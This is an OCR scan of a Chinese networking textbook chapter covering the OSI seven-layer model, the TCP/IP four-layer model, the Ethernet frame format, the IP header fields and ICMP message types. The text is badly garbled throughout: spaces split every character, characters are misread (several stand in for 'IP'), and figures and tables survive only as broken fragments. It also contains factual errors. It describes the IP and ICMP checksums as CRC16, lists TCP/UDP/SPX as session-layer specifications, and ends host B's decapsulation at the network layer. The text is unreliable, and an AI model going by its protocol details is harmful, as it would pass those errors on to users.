据 。OSIISO 的 7 层 网 络 结构 模型 可 以 将 网 络 协议 栈 的 不 同 层 的 实现 划分 为 不 同 的 层次 ， 
将 问题 简化 ， 方 便 网 络 协议 栈 的 实现 。 同 时 ，7 层 模 型 为 网 络 中 不 同 厂商 的 软 硬 件 产品 的 
兼 容 性 提出 了 解决 的 办 法 。 由 于 7 层 模 型 的 方式 实现 起 来 太 复杂 ， 所 以 并 没有 一 个 实际 使 
用 的 7 层 网 络 协议 栈 。 


5.1.2 OSI 的 7 层 网 络 结构 


在 OSI 的 7 层 结构 中 ， 自 下 而 上 ， 每 一 层 规定 了 不 同 的 特性 ， 完 成 不 同 的 功能 。 共 有 
以 下 7 个 层次 。 

口 物理 层 (Physical Layer) : 它 规定 了 物理 线路 和 设备 的 触发 、 维 护 、 关 闭 物 理 设 
备 的 机 械 特 性 、 电 气 特性 、 功 能 特性 和 过 程 ， 为 上 层 的 传输 提供 了 一 个 物理 介质 ， 
本 层 是 通信 端点 之 间 的 硬件 接口 。 本 层 中 数据 传输 的 单位 为 比特 (b) 。 属 于 本 层 
定义 的 规范 有 EIA/TIA RS-232、EIA/TIA RS-449、V.35、RJ-45 等 ， 实 际 使 用 中 的 
设备 如 网 卡 等 属于 本 层 。 

口 数据 链 路 层 (Data Link Layer) : 数据 链 路 层 在 物理 介质 基础 之 上 提供 可 靠 的 数据 
传输 ， 在 这 一 层 利 用 通信 信道 实现 无 差错 传输 ， 提 供 物理 地 址 寻 址 、 数 据 层 帧 、 
数据 的 检测 重 发 、 流 量 控制 和 链 路 控制 等 功能 。 在 数据 链 路 层 中 数据 的 单位 为 帧 
(frame) 。 属 于 本 层 定义 的 规范 有 SDLC、HDLC、PPP、STP、 帧 中 继 等 ， 实 际 
中 的 MAC 属于 本 层 。 

口 网 络 层 (NetWork Layer) : 网 络 层 负责 将 各 个 子 网 之 间 的 数据 进行 路 由 选择 ， 将 
数据 从 一 个 主机 传送 到 另 一 个 主机 ， 其 功能 包括 网 际 互联 、 流 量 控制 和 拥塞 控制 
等 。 在 本 层 中 数据 的 单位 为 数据 包 〈packet) 。 属 于 本 层 定义 的 规范 有 IP、IPX、 
RIP、OSPF 等 ， 实 际 中 的 路 由 器 属于 本 层 。 

口 传输 层 (Transport Layer) : 传输 层 将 上 层 的 数据 处 理 为 分 段 的 数据 ， 提 供 可 靠 或 
者 不 可 靠 的 传输 ， 为 上 层 掩盖 下 层 细节 ， 保 证 会 话 层 的 数据 信息 能 够 传送 到 另 一 
方 的 会 话 层 ( 但 不 一 定 传送 到 另 一 方 的 应 用 层 ) 。 在 传输 层 中 数据 的 单位 为 数据 
段 (segment) 。 属 于 本 层 定义 的 规范 有 TCP、UDP、SPX 等 。 

口 会 话 层 (Session Layer) : 会 话 层 管理 主机 之 间 的 会 话 过 程 ， 包 括 会 话 的 建立 、 终 
止 和 会 话 过 程 中 的 管理 ， 来 提供 服务 请 求 者 和 提供 者 之 间 的 通信 。 属 于 本 层 定 义 
的 规范 有 TCP、UDP、SPX 等 。 

口 表示 层 (Presentation Layer) : 表示 层 对 网 络 传输 的 数据 进行 变换 ， 使 得 多 个 主机 
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之 间 传 送 的 信息 能 够 互相 理解 ， 包 括 数据 的 压缩 、 加 密 、 格 式 的 转换 等 ， 例 如 图 
片 数据 的 发 送 前 压缩 和 接收 后 的 解压 。 属 于 本 层 定义 的 有 ASCII、JPEG、MPEG 
等 标准 。 

口 应 用 层 (Application Layer) : 应 用 层 为 应 用 程序 提供 访问 网 络 服 务 的 接口 ， 为 用 
户 提 供 常用 的 应 用 ， 例 如 经 常 使 用 的 电子 邮件 应 用 程序 、 网 络 浏览 器 等 都 基于 本 
层 、 在 本 层 之 上 定义 。 属 于 本 层 定义 的 规范 有 Telnet、FTP、HTTP、SNMP、P2P 
等 应 用 层 协 议 。 

OSI 的 7 层 结构 中 的 底 3 层 即 物理 层 、 数 据 链 路 层 和 网 络 层 构成 了 通信 子 网 层 ， 它 为 
网 络 的 上 层 提供 通信 服务 。 需 要 注意 的 是 ，OSI 模型 并 不 是 一 个 网 络 结构 ， 因 为 它 并 没有 
定义 每 个 层 所 拥有 的 具体 的 服务 和 协议 , 它 只 是 告诉 我 们 每 一 个 层 应 该 做 什么 工作 。 但 是 ， 
ISO 为 所 有 的 层次 提供 了 标准 ， 每 个 标准 都 有 其 自己 的 内 部 标准 定义 。 


5.1.3 OSI 参考 模型 中 的 数据 传输 


如 图 5.2 所 示 为 一 个 运行 于 主机 A 上 的 应 用 程序 , 通过 网 络 发 送 数 据 到 主机 B 上 的 应 
用 程序 ， 数 据 流 通过 在 主机 A 上 由 上 至 下 依次 经 过 网 络 协议 栈 ， 通 过 网 络 发 送 给 主机 B， 
在 主机 B 上 又 自 下 而 上 地 经 过 OSI 的 7 层 网 络 协议 结构 。 


ee a 
应 用 层 | ^ 应 用 层 头 部 | 数据 应 用 层 
表示 层 表示 层 头 部 | 应 用 层 头 部 和 表示 层 
会 话 层 解 会 话 层 头 部 | 表示 层 头 部 | 应 用 层 头 部 封 | | 会 话 层 
传输 层 封 数据 链 路 层 头 部 | 会 话 层 头 部 | 表示 层 头 部 | 应 用 层 头 部 和 装 | | 传输 导 
网 络 层 网 络 层 头 部 | 数据 链 路 层 头 部 | 会 话 层 头 部 | 表示 层 头 部 | 应 用 层 头 部 网 络 层 
a 传输 层 头 部 | 网 络 层 头 部 | 数据 链 路 层 头 部 | 会 话 层 头 部 | 表示 层 头 部 | 应 用 层 头 部 传输 层 尾部 et 
物理 层 |--------------------------------------------------- 比特 流 k-------- 一 -| 物理 层 


图 5.2 OSI 的 7 层 参考 模型 中 的 数据 传输 过 程 


主机 A 的 过 程 是 一 个 封装 的 过 程 , 数据 从 应 用 程序 依次 经 过 应 用 层 、 表 示 层 、 会 话 层 、 
传输 层 、 网 络 层 、 数 据 链 路 层 和 物理 层 发 送 给 主机 B。 

口 当主 机 A 的 应 用 程序 需要 发 送 数据 时 ， 数 据 由 应 用 程序 调用 应 用 层 接口 ， 进 入 协 
议 栈 的 应 用 层 。 

口 在 网 络 协议 栈 的 应 用 层 ， 应 用 程序 将 要 发 送 的 应 用 程序 数据 被 协议 栈 加 上 应 用 层 
的 报头 ， 包 装 成 形成 应 用 层 协 议 数据 单元 ， 然 后 将 数据 传递 给 协议 栈 中 应 用 层 的 
下 一 层 一 一 表示 层 。 

口 在 表示 层 ， 它 不 关心 应 用 层 传 递 过 来 的 数据 内 容 ， 把 应 用 程序 发 送 的 数据 和 网 络 
协议 栈 应 用 层 头 部 作为 一 个 整体 进行 处 理 ， 加 上 表示 层 的 报头 。 然 后 ， 递 交 到 下 
妓 会话 层 。 

口 与 表示 层 类 似 ， 在 会 话 层 、 传 输 层 、 网 络 层 、 数 据 链 路 层 协议 栈 分 别 将 其 上 层 传 
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递 的 数据 加 上 自己 的 包头 ， 然 后 ， 传 递 给 自己 层 的 下 一 层 。 即 数据 分 别 又 加 上 会 
与 其 他 层 不 一 致 的 地 方 是 还 要 加 上 一 个 数据 链 路 层 的 尾部 ， 打 包 成 一 个 数据 帧 ， 
然后 ， 传 递 给 物理 层 。 数 据 链 路 层 的 尾部 通常 是 数据 的 校 验 和 ， 一 般 采 用 CRC16 
的 校 验方 式 。 

在 物理 层 ， 主 机 A 的 网 络 设备 将 数据 链 路 层 传递 过 来 的 数据 发 送 到 网 络 上 。 


主机 B 的 过 程 与 主机 A 相反 , 是 一 个 解 封 的 过 程 , 数据 依次 经 过 物理 层 、 数 据 链 路 层 、 
网 络 层 、 传 输 层 、 会 话 层 、 表 示 层 和 网 络 层 ， 将 主机 B 发 送 的 数据 接收 和 解 包 ， 最 后 数据 
传递 给 应 用 程序 。 


口 


口 


口 


口 


主机 B 的 物理 层 网 络 设备 接收 到 数据 到 来 的 信号 后 ， 将 接受 到 的 数据 保存 下 来 ， 
然后 传递 给 它 的 上 一 层 一 一 数据 链 路 层 。 

数据 链 路 层 把 从 物理 层 获得 的 数据 去 掉头 部 和 尾部 后 ， 进 行 数据 校 验 ， 发 现 没有 
出 错 ， 把 数据 传递 给 其 上 一 层 一 一 网 络 层 。 

与 数据 链 路 层 类 似 ， 网 络 层 、 传 输 层 、 会 话 层 、 表 示 层 、 应 用 层 分 别 将 从 其 下 一 
层 获得 的 数据 一 层 层 剥 去 报头 ， 传 递 给 对 应 的 上 一 层 。 

最 后 ， 主 机 A 发 送 的 数据 到 达 主机 B 上 的 应 用 程序 中 。 


5.2 TCP/IP 协议 栈 


5.1 节 对 ISO/OSI 的 7 层 结构 进行 了 简单 的 介绍 ， 由 于 ISO 制定 的 OSI 参考 模型 过 于 
庞大 、 复 杂 ， 在 实现 时 造成 了 很 多 困难 ， 从 而 招致 了 许多 批评 。 在 实际 实现 中 ，TCP/IP 协 
议 栈 获得 了 更 为 广泛 的 应 用 ， 目 前 主流 的 操作 系统 网 络 协议 栈 基 本 上 采用 了 TCP/IP 协 


议 栈 。 
5:2:1 


TCP/IP 协议 栈 参考 模型 


经 典 的 TCP/IP 参考 模型 从 上 至 下 分 为 4 个 层次 : 应 用 层 、 传 输 层 、 网 络 互联 层 和 主 
机 到 网 络 层 。 与 OSI 模型 不 同 的 是 在 TCP/IP 参考 模型 中 ， 根 据 实际 情况 将 OSI 参考 模型 
的 会 话 层 和 表示 层 合并 到 应 用 层 中 ; 同时 ， 将 OSI 参考 模型 中 的 数据 链 路 层 和 物理 层 合并 
为 主机 到 网 络 层 。TCP/IP 参考 模型 与 OSI 参考 模型 的 对 照 参见 图 5.3。 

实际 应 用 中 TCP/IP 的 层次 结构 如 图 5.4 所 示 ， 其 各 层 的 主要 功能 如 下 所 述 。 


口 


主机 到 网 络 层 : 包括 设备 和 数据 链 路 层 的 主机 到 网 络 层 ， 在 TCP/IP 参考 模型 中 并 
没有 描述 这 一 层 的 具体 实现 ， 只 是 规定 能 给 其 上 一 层 的 网 络 互联 层 提供 访问 接口 ， 
可 以 传输 卫 数据 包 ， 这 一 层 的 具体 实现 随 着 网 络 类 型 的 不 同 而 不 同 。 
网 络 互联 层 : 网 络 互联 层 是 整个 TCP/IP 协议 栈 的 核心 。 它 将 数据 包 进行 分 组 并 发 
往 目 的 主机 或 者 网 络 ， 为 了 尽快 地 发 送 分 组 ， 一 个 数据 包 的 分 组 可 能 要 经 过 不 同 
的 路 径 进行 传递 。 这 造成 了 分 组 之 间 到 达 目的 网 络 或 者 主机 的 顺序 不 是 原来 发 送 
分 组 的 顺序 ， 需 要 在 本 层 对 分 组 进行 排序 。 网 络 互联 层 定义 了 数据 包 的 分 组 格式 
和 协议 一 一 IP 协议 (Intemet Protocol) ， 因 此 网 络 互 联 层 又 经 常 称 为 IP 层 。 网 络 
互联 层 的 功能 有 路 由 、 网 际 互联 和 拥塞 控制 等 。 
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OSI 七 层 参 考 模型 TCP/IP 四 层 参 考 模型 


应 用 层 
表示 层 = 应 用 层 
会 话 层 


传输 层 一 | 传输 层 


网 络 层 一 一 一 一 一 一 网 络 互联 层 


链 路 层 
~ 主机 到 网 络 
物理 导 


图 5.3 TCP/IP 参考 模型 和 OSI 参考 模型 对 照 


应 用 层 Telnet、FTP 、HTTP、P2P | SNMP、 TFTP、 NFS、 P2P 
传输 层 TCP UDP 
网 络 互 连 层 ARP , ICMP 
以 | 令 FDDI HDLC PPP 
主机 到 网 络 太 
网 | 网 802.2 802.3 


图 5.4 TCP/IP 参考 模型 的 层次 结构 


传输 层 : TCP/IP 参考 模型 中 传输 层 的 功能 提供 源 主机 和 目标 主机 上 的 对 等 层 之 间 
可 以 进行 会 话 的 机 制 。 在 传输 层 中 定义 了 两 种 协议 ， 传 输 控制 协议 (transmission 
control protocol，TCP ) 和 用 户 数 据 报 协 议 (user datagram protocol,UDP) 。TCP 
协议 是 一 个 面向 连接 的 、 可 靠 的 协议 。 它 利用 IP 层 的 机 制 在 不 可 靠 连 接 的 基础 上 
实现 可 靠 的 连接 ， 通 过 发 送 窗口 控制 、 超 时 重 发 、 分 包 等 方法 将 一 台 主 机 发 出 的 
字 节 流 发 往 互 联网 上 的 其 他 主机 。UDP 协议 是 一 个 不 可 靠 的 、 无 连接 协议 ， 主 要 
适用 于 不 怕 数 据 丢 失 、 不 需要 对 报 文 进 行 排序 、 流 量 控制 的 场景 。 


区 


用 层 : TCP/IP 参考 模型 中 把 OSI 参考 模型 中 的 会 话 层 和 表示 层 取消 ， 其 功能 


被 合并 到 应 用 层 。 基 于 TCP 和 UDP 实现 了 很 多 的 应 用 层 协 议 , 如 基于 TCP 协议 
的 文件 传输 协议 (File Transfer Protocol, FTP)、Telnet 协议 、 超 文本 链接 协议 (Hyper 
Text Transfer Protocol，HTTP) 等 ,基于 UDP 的 协议 有 简化 的 FTP 协议 TFTP、 网 
络 管理 协议 SNMP、 域 名 服务 DNS、 网 络 文件 共享 NFS 和 SAMBA 等 ， 以 及 两 
种 方式 均 有 实现 的 协议 ， 例 如 目前 应 用 十 分 广泛 的 多 种 P2P 协议 (BitTorrent、 


eMule 等 ) 。 


全 注意 : IP 层 中 包含 网 际 控制 报 文 协议 (ICMP ) 和 地 址 识别 协议 ， 实 际 上 它们 并 不 是 卫 
层 的 一 部 分 ， 但 直接 同 IP 层 一 起 工作 。ICMP 用 于 报告 网 络 上 的 某 些 出 错 情 况 ， 
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允许 网 际 路 由 器 传输 差错 信息 或 测试 报 文 。ARP 处 于 IP 和 数据 链 路 层 之 间 ， 它 
是 在 32 位 IP 地 址 和 48 位 局 域 网 地 址 之 间 执 行 翻译 的 协议 。 


5.2.2 主机 到 网 络 层 协 议 


通常 情况 下 ， 主 机 到 网 络 层 的 协议 对 应 于 OSI 的 数据 链 路 层 ， 对 于 硬件 及 其 驱动 层 
TCP/IP 协议 没有 进行 规范 。 由 TCP/IP 的 4 层 结构 可 以 看 出 ， 本 层 主要 为 IP 协议 和 ARP 
协议 提供 服务 、 发 送 和 接收 网 络 数据 报 。 本 层 中 由 于 要 实现 跨 网 和 跨 设备 的 互通 ， 有 很 多 
的 实现 方式 ， 例 如 串 行 线路 (Serial Line IP，SLIP)、 点 对 点 PPP 等 ， 本 书 中 仅 对 以 太 网 的 
实现 方式 进行 简单 地 介绍 。 

以 太 网 是 由 数字 设备 公司 (Digital Equipment Corp，DEC)、 英 特 尔 公司 和 Xerox 公司 
在 1982 年 公布 的 一 个 标准 ， 目 前 TCP/IP 技术 主要 基于 此 标准 。 它 采用 一 种 带 冲突 检测 的 
载波 侦 听 多 路 接 入 的 方法 进行 传输 ， 即 CSMA/CD (Carrier Sense,， Maultiple Access with 
Collision Detection)。 以 太 网 的 封包 格式 如 图 5.5 所 示 ， 在 卫 数据 的 基础 上 增加 了 14 个 


字 节 。 


目的 地 址 (6 字 节 ) | 源 地 址 (6 字 节 ) | 类 型 (2 字 节 ) 数据 (46 一 1500 字 节 ) CRC (4 字 节 ) 
Oe IP 数 据 包 (46 一 1500 字 节 ) CRC (4 字 节 ) 
类 型 0806 


2 字 节 ) ”|ARP 请 求 应 答 (28 字 节 ) | PAD(18 字 节 ) 


2 ARP 请 求 应 答 (28 字 节 ) | PAD (18 字 节 ) 


图 5.5 以 太 网 的 数据 格式 


以 太 网 用 48bit (6 字 节 ) 来 表示 源 地 址 和 目的 地 址 。 这 里 的 源 地 址 和 目的 地 址 指 的 是 
硬件 地 址 ， 例 如 网 卡 的 MAC 地 址 。 

在 地 址 后 面 是 两 个 字 节 的 表示 类 型 的 字段 ,例如 0800 表示 此 帧 的 数据 为 IP 数据 , 0806 
表示 此 帧 为 ARP 请 求 。 

类 型 字段 之 后 是 数据 ， 对 于 以 太 网 ， 规 定数 据 段 的 大 小 范围 是 46 个 字 节 到 1500 个 字 
节 , 不 足 的 数据 要 用 空 字符 填 满 。 例如 ARP 协议 的 数据 格式 为 28 个 字 节 ， 为 了 符合 规范 ， 
其 后 有 18 个 字 节 的 占 位 符 用 于 满足 最 少 46 字 节 的 要 求 。 
全 注意 : 数据 段 的 长 度 有 一 个 最 大 值 ， 以 太 网 为 1500， 这 个 特性 称 为 MTU， 即 最 大 传输 


单元 。 如 果 IP 层 有 一 个 要 传送 的 数据 长 度 比 MTU 大 ,在 IP 层 数据 要 进行 分 片 ， 
使 得 每 个 片 都 小 于 MTU. 


CRC 字段 用 于 对 帧 内 数据 进行 校 验 ， 保 证 数据 传输 的 正确 性 ， 通 常 由 硬件 实现 ， 例 如 
在 网 卡 设备 中 实现 网 络 数据 的 CRC 校 验 。 
全 注意 : 以 太 网 的 头 部 长 度 为 14 的 特点 在 某 些 平台 的 实现 上 会 造成 效率 上 的 问题 , 例如 4 
字 节 对 齐 的 平台 ， 在 取得 他 数据 的 时 候 通 常会 重新 复制 一 次 。 
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5.2.3 IP 协议 


IP 协议 是 TCP/IP 协议 中 最 重要 的 协议 , 它 为 TCP、UDP、ICMP 等 协议 提供 传输 的 通 
路 。 IP 层 的 主要 目的 是 提供 子 网 的 互联 , 形成 较 大 的 网 络 , 使 不 同 的 子 网 之 间 能 传输 数据 。 
IP 层 主要 有 如 下 作用 。 

口 数据 传送 : 将 数据 从 一 个 主机 传输 到 另 一 个 主机 。 

口 寻 址 : 根据 子 网 划分 和 卫 地 址 ， 发 现 正 确 的 目的 主机 地 址 。 

口 路 由 选择 : 选择 数据 在 互联 网 上 的 传送 路 径 。 

口 数据 报 文 的 分 段 : 当 传送 的 数据 大 于 MTU 时 , 将 数据 进行 分 段 发 送 和 接收 并 组 装 。 

IP 数据 的 格式 如 图 5.6 所 示 ， 不 包含 选项 字段 ， 其 头 部 的 长 度 为 20 个 字 节 。 


0 15 16 31 
版 本 (4 位 ) | 首部 长 度 (4 位 )| 服务 类 型 (8 位 ) 总 长 度 (16 位 ) 
标识 (16 位 ) 标识 (3 位 ) 片 偏 移 (13 位 ) 
生存 时 间 TTLG8 位 》 。 | 协议 类 型 (8 位 ) 头 部 校 验 和 (16 位 ) Ue 
源 IP 地 址 (32 位 ) 
目的 卫 地 址 (32 位 ) 
选项 (32 位 ) 


数据 


图 5.6_IP 头 部 的 数据 格式 


1. 版 本 


IP 协议 的 版 本 号 ， 长 度 为 4 位， 规定 网 络 所 实现 的 IP 版 本 ， 例 如， 如 果 主 机 为 IPv4 
协议 ， 此 字段 的 值 为 4， 而 IPv6 协议 此 字段 的 值 为 6。 


2. 首部 长 度 


首部 长 度 指 的 是 IP 字段 除去 数据 的 整个 头 部 的 数据 长 度 ， 以 32 位 的 字 为 单元 计算 。 
IP 首部 的 长 度 以 字 为 增 量 变化 ， 最 短 的 IP 头 是 20 字 节 (不 包括 数据 和 选项 )。 因 此 这 个 
字段 最 小 值 是 5 (20 字 节 为 160 位 ，160 位 /32 位 =5)， 也 就 是 5 个 32 位 字 长 。 由 于 它 是 一 
个 4 位 的 字段 ， 所 以 IP 的 首部 最 长 为 60 个 字 节 (15 个 字 乘 以 4)。 

3. 服务 类 型 (TOS) 

IP 的 服务 类 型 字段 长 度 为 8 位 。 此 字段 包含 3 位 的 优先 权 (现在 已 经 忽略 )，4 位 的 T 
服务 类 型 子 字段 和 1 位 的 保留 位 (必须 置 0)。4 位 的 服务 类 型 分 别 为 最 小 延迟 (D)、 最 大 
吞吐 量 (T)、 最 高 可 靠 性 (R)、 最 小 费用 (F)。 这 4 个 位 中 最 多 只 用 一 个 位 置 1， 如 果 全 
为 0， 表 示 为 一 般 服 务 。 服 务 类 型 的 具体 含义 参见 表 5.1。 
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表 5.1 服务 类 型 选项 含义 

字段 | 人 ff 权 | D | T | R | FF | mg 
含义 迟 吞吐 量 可 靠 性 费用 未 用 
口 优先 权 字段 3 位 ， 因 此 可 以 有 0 一 7 的 值 (0 为 正常 值 ，7 为 网 络 控制 ， 但 是 此 字 
段 目 前 已 经 被 忽略 ) 。 它 允许 传输 站 点 的 应 用 程序 设 定向 IP 层 发 送 数据 报 文 的 优 
先 权 。 该 字段 与 D、T、R、F 相 结合 ， 确 定 应 采取 哪 种 路 由 方式 。 
DD 位 字段 为 1 个 b 长度， 当 值 为 1 时 表示 请 求 低 时 延 。 
T 位 字段 为 1 个 b 长度， 当 值 为 1 时 表示 请 求 高 吞吐 量 。 
R 位 字段 为 1 个 b 长度， 当 值 为 1 时 表示 请 求 高 可 靠 性 。 
F 位 字段 为 1 个 b 长 度 ， 当 值 为 1 时 表示 请 求 低 费用 。 

例如 ， 如 果 他 分 组 有 两 个 以 上 的 路 由 方式 可 进行 选择 ， 路 由 器 读 取 这 些 字段 的 值 , 根 
据 服 务 类 型 的 设置 情况 来 选择 一 个 合适 的 路 由 。 服 务 类 型 字段 由 应 用 程序 进行 设置 ， 路 由 
器 仅 在 必要 时 进行 读 取 ， 不 进行 设置 。 


4. 总 长 度 


总 长 度 字 段 的 长 度 是 16 位 ， 表 示 以 字 节 为 单位 的 数据 报 文 长 度 ， 长 度 包含 IP 的 头 部 
和 数据 部 分 。 利 用 头 部 长 度 和 总 长 度 字段 可 以 计算 卫 数据 报 文中 数据 内 容 的 起 始 地 址 和 长 
度 ， 由 于 本 字段 的 长 度 为 16 位 ， 所 以 卫 数据 报 文 最 大 可 达到 65535 个 字 节 的 长 度 。 


5. 标识 和 片 偏 移 


IP 每 发 一 份 数据 报 文 都 会 填写 一 个 标识 用 来 表示 此 数据 包 ， 发 送 完 后 此 值 会 加 1。 在 
IP 进行 分 片 的 时 候 ， 将 标识 复制 的 IP 的 头 部 表示 数据 报 文 的 来 源 ， 还 要 加 上 分 片 数据 在 
原 数据 报 文中 的 偏 移 地 址 ， 便 于 之 后 进行 组 装 。 利 用 字段 总 长 度 和 片 偏 移 可 以 重新 组 装 卫 
的 数据 报 文 。 总 长 度 指出 原始 包 的 总 长 度 , 片 偏 移 指出 该 包 位 于 正在 组 装 的 I 了 P 报 文 的 偏 移 
量 ， 偏 移 量 从 头 部 开始 计算 。 


6. 生存 时 间 (TTL) 


TTL (Time To Live) 字段 的 值 表示 数据 报 文 最 多 可 以 经 过 的 路 由 器 的 数量 。 它 指定 数 
据 报 文 的 生存 时 间 ， 源 主机 发 送 数据 时 设置 TTL (一 般 为 32 或 者 64)， 经 过 一 个 路 由 器 后 
TTL 的 值 减 1。 当 TTL 为 0 的 时 候 , 路 由 器 丢弃 此 包 , 并 发 送 一 个 ICMP 报 文通 知 源 主 机 。 
TTL 的 出 现 是 由 于 在 包 的 传递 过 程 中 可 能 会 出 现 错误 情况 ， 引 起 包 在 Internet 的 路 由 器 之 
间 不 断 循环 。 为 防止 此 类 事件 发 生 ， 因 而 引入 了 TTL 限制 报 文 经 过 路 由 器 的 个 数 。 


7. 协议 类 型 


该 字段 为 8 位 长 度 ,表示 卫 上 承载 的 是 什么 高 级 协议 。 在 封包 和 解 包 的 过 程 中 , TCP/IP 
协议 栈 知道 将 数据 发 给 哪个 层 的 协议 做 相关 的 处 理 ， 协 议 的 值 及 含义 参见 表 5.2。 例 如 ， 
协议 类 型 为 6 时 ， 网 络 协议 栈 知 道 PP 上 承载 的 是 TCP 协议 ，IP 层 处 理 完毕 后 会 交 给 其 上 


OOOCDO 


.145 。 


第 2 篇 Linux 用 户 层 网 络 编程 


一 层 协议 中 UDP 和 TCP 中 的 TCP 协议 层 进行 处 理 。 
表 5.2 协议 类 型 的 含义 


协议 类 型 
TCP 
UDP 


8. 校 验 和 


校 验 和 是 一 个 16 位 长 度 的 数值 ， 使 用 循环 元 余 校 验 生成 ， 其 作用 是 保证 IP 帧 的 完整 
性 。 发 送 端 发 送 数据 的 时 候 要 计算 CRC16 校 验 值 ， 填 入 此 字段 ， 接 收 端 会 计算 IP 的 校 验 
直 与 此 字段 进行 匹配 ， 如 果 不 匹配 ,表示 此 帧 发 生 错 误 ， 将 丢弃 此 报 文 。 在 路 由 的 过 程 中 ， 
于 每 经 过 一 个 路 由 器 都 要 修改 TTL 的 值 ， 所 以 需要 重新 计算 CRC16， 将 结果 填 入 此 字 
段 中 。 


9. IP 选项 


IP 选项 字段 是 一 个 32b 的 字段 ， 该 选项 用 来 识别 IP 的 数据 段 是 正常 数据 还 是 用 做 网 
络 控制 的 数据 。 主 要 有 如 下 定义 ; 

口 安全 和 处 理 限制 。 

口 路 径 记 录 : 记录 所 经 历 路 由 器 的 IP 地 址 。 

口 宽松 源 站 路 由 : 指定 数据 报 文 必须 经 历 的 耳 地址， 可 以 经 过 没有 指定 的 IP 地址 。 

口 严格 的 源 站 路 由 : 指定 数据 报 文 必须 经 历 的 了 P 地 址 , 不 能 经 过 没有 指定 的 IP 地 址 。 

10. 源 地 址 和 目的 地 址 


源 地 址 表示 发 送 数 据 的 主机 或 者 设备 的 IP 地 址 , 目的 地 址 为 接收 数据 的 主机 IP 地 址 。 
这 两 个 字段 均 为 32 位 长 度 。 字 段 的 目的 用 于 识别 Internet 上 的 主机 。 


5.2.4 ”网 际 控制 报 文 协议 (ICMP) 
ICMP 协议 用 于 传递 差错 信息 、 时 间 、 回 显 、 网 络 信息 等 报 文 控制 数据 。 
1. ICMP 协议 格式 


ICMP 协议 的 数据 位 于 卫 字段 的 数据 部 分 ， 它 是 在 正 报 文 的 内 部 被 传输 的 ， 如 图 5.7 
表示 ICMP 报 文 在 IP 报 文中 的 位 置 。 


= 


| IP 数 据 报 文 


IP 头 部 ICMP 报 文 


(20 字 节 ) 
图 5.7 ICMP 报 文 在 IP 报 文中 的 位 置 


ICMP 报 文 的 数据 格式 如 图 5.8 所 示 ，ICMP 报 文 的 前 4 个 字 节 的 格式 是 相同 的 ， 表示 
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类 型 、 代 码 和 校 验 和 ， 而 后 面 的 字 节 则 互 不 相同 。 类 型 字段 为 8 个 位 , 可 以 表示 15 个 不 同 
类 型 的 ICMP 报 文 。 代 码 段 用 于 对 类 型 字段 ICMP 报 文 的 详细 规定 , 最 多 可 以 表示 16 种 类 
型 。 校 验 和 表示 的 范围 覆盖 整个 ICMP 的 报 文 ,包括 头 部 和 数据 部 分 ， 校 验方 法 与 卫 一 致 
(CRC16)，ICMP 协议 的 校 验 和 是 强制 性 的 。 


0 7 8 15 16 31 
类 型 (8 位 ) | 代码 (8 位 ) | 校 验 和 (16 位 ) 


(此 部 分 不 同 的 类 型 和 代码 格式 不 同 ) 


图 5.8 ICMP 报 文 的 数据 格式 


2. ICMP 的 报 文 类 型 


ICMP 的 报 文 类 型 由 类 型 和 代码 来 决定 报 文 的 方式 ， 具体 含义 见 表 5.3。 表 格 中 的 最 后 
两 列表 示 报 文 用 于 查询 还 是 差错 ， 用 V 表 示 肯 定 。 主 要 包含 如 下 几 类 ， 目 的 不 可 达 、 时 间 
鹤 请 求 应 答 、 回 显 请 求 应 答 、 地 址 掩 码 请 求 应 答 ， 具 体 含义 在 表 5.3 中 进行 了 详细 的 解释 。 


表 5.3 ICMP 报 文 类 型 和 代码 的 含义 


类 型 
0 回 显 应 答 ，ping 程序 使 用 | w | 
: 的 不 可 达 | | 
| 


和 
协议 不 可 达 


端口 不 可 达 
需要 进行 分 片 但 设置 了 不 分 片 


源 站 选 路 失败 
目的 网 络 不 可 识别 

Ek 目的 主机 不 可 识别 
源 主机 被 隔离 (已 经 废弃 ) 
目的 网 络 被 强制 禁止 
目的 主机 被 强制 禁止 
日 于 服务 类 型 的 设置 而 网 络 不 可 达 


日 于 服务 类 型 的 设置 而 主机 不 可 达 
FF 过滤， 通信 被 强制 禁止 


主机 越权 
优先 权 中 止 生 效 


| 


.147 。 


第 2 篇 ”Linux 用 户 层 网 络 编程 


类 型 代码 差错 
4 0 V 
V 
0 V 
5 | 问 _ 
2 和 网 络 重 定 V 
对 服务 类 型 和 主机 重 定 V 
8 0 请 求 回 显 ， 用 于 ping 
9 0 路 由 器 通告 
10 0 路 由 器 请 求 
超时 J 
11 0 在 传输 期 间 ，TTL 为 0 y 
1 在 数据 组 装 期 间 ，TTL 为 0 y 
1 缺少 必须 的 选项 V 
15 0 信息 请 求 
16 0 信息 应 答 
18 0 地 址 掩 码 应 答 


3. 目的 不 可 达 的 报 文 格式 


ICMP 报 文中 项 目 最 多 的 是 报 文 不 可 达 的 差错 报 文 ， 它 的 格式 如 图 5.9 所 示 。 类 型 字段 
的 值 为 3， 代码 字段 根据 实际 情况 进行 设置 。 第 4 一 7 个 字 节 保留 ， 必 须 设 置 为 0。 余下 的 字 
段 为 不 可 达 IP 报 文 的 头 部 (包含 选项 字段 ) 和 IP 报 文中 数据 部 分 的 前 8 个 字 节 。 例 如 ， 如 
果 源 了 人’ 头 部 没有 选项 字段 的 话 ，ICMP 的 报 文 长 度 为 36 个 字 节 (1 个 字 节 的 类 型 ，1 个 字 节 
的 代码 ，2 个 字 节 的 校 验 和 ，4 个 字 节 的 保留 字段 ，20 个 字 节 的 人 头 部 ，8 个 字 节 的 数据 )。 


0 7 8 15 16 31 
类 型 (3) 代码 (0~15) 校 验 和 | 
8 字 节 
保留 (全 为 0) | 


也 头 部 + 原始 到 数 据 报 文中 数据 部 分 的 前 8 个 字 节 


图 5.9 ICMP 报 文 的 报 文 不 可 达 数 据 格式 
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例如 ， 一 个 端口 不 可 达 的 ICMP 报 文 ， 可 能 的 数据 格式 如 图 5.10 所 示 。 报 文 包含 14 
个 字 节 的 以 太 网 头 部 ，20 个 字 节 的 IP 地 址 头 部 ， 加 上 ICMP 的 8 个 字 节 的 头 部 ，ICMP 数 
据 部 分 包含 出 错 报 文 的 IP 头 部 和 8 个 字 节 的 UDP 头 部 。 


4. 地 址 掩 码 的 请 求 应答 格 式 


无 盘 工 作 站 在 启动 的 时 候 使 用 RARP 协议 获得 本 机 的 卫 地 址 ， 而 子 网 掩 码 的 获得 使 
] ICMP 协议 获得 或 者 BOOTP 协议 获得 。 地 址 掩 码 请 求 的 格式 如 图 5.11 所 示 ， 与 图 5.8 
